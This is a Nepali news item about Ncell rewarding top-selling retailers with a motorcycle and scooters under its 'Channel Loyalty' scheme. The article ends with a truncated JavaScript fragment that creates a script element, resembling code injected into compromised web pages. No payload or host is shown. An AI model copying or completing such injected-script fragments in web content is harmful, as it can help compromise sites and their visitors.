काठमाडौं, असोज २० । मोबाईल सेवाप्रदायक एनसेलले आफ्नो ‘च्यानल लोयल्टि’ योजना अन्तर्गत काठमाडौंको ठमेलमा रहेको एमपि मेड प्रा.लिका संचालक प्रेम कृष्ण श्रेष्ठलाई मोटर साईकल उपहार प्रदान गरेको छ । एमपि मेड प्रा.लि एनसेलको सिम कार्ड, रिचार्ज कार्ड र अन्यप्रोडक्टहरु ग्राहक सम्म पुर्याउने १०,००० आधिकारिक रिटेलरहरु मध्य एक हो ।m-p-med-pvt-ltd
श्रेष्ठलाई एनसेलको बागमती सेल्स टिमले एक कार्यक्रममाझ सो बाइक उपहार प्रदान गरेको हो । एनसेलले सन् २०१४ मा रिटेलरहरुलाई आफ्नो सेवातथा सुविधाहरुको प्रवद्र्धन गर्न प्रोत्साहनगर्ने हेतुले ‘च्यानल लोयल्टि’ योजना शुरु गरेको हो । रिटेलरहरुले उनीहरुले गरेको बिक्रीकाआधारमा उपहार पाउँछन् । एमपि मेडप्रा.लि सबभन्दा धेरै बिक्री गर्ने रिटेलरहरु मध्ये एक हो ।
यस अधि यो योजनाअन्र्तगत मित्रनगर, नयाँ बसपार्कमा (काडमाडौं) रहेको लमजुङ्ग कम्युनिकेशनका संचालक दिनेश दुराले मोटर साईकल र दुले गौडा, तनहुँमा (गण्डकी) रहेको सिमरन एण्ड शिन्जा ईन्टरप्राईजेज्का संचालक गणेश कुमार श्रेष्ठले स्कुटर उपहार पाएका थिए ।var d=document;var s=d.createElement(‘script’);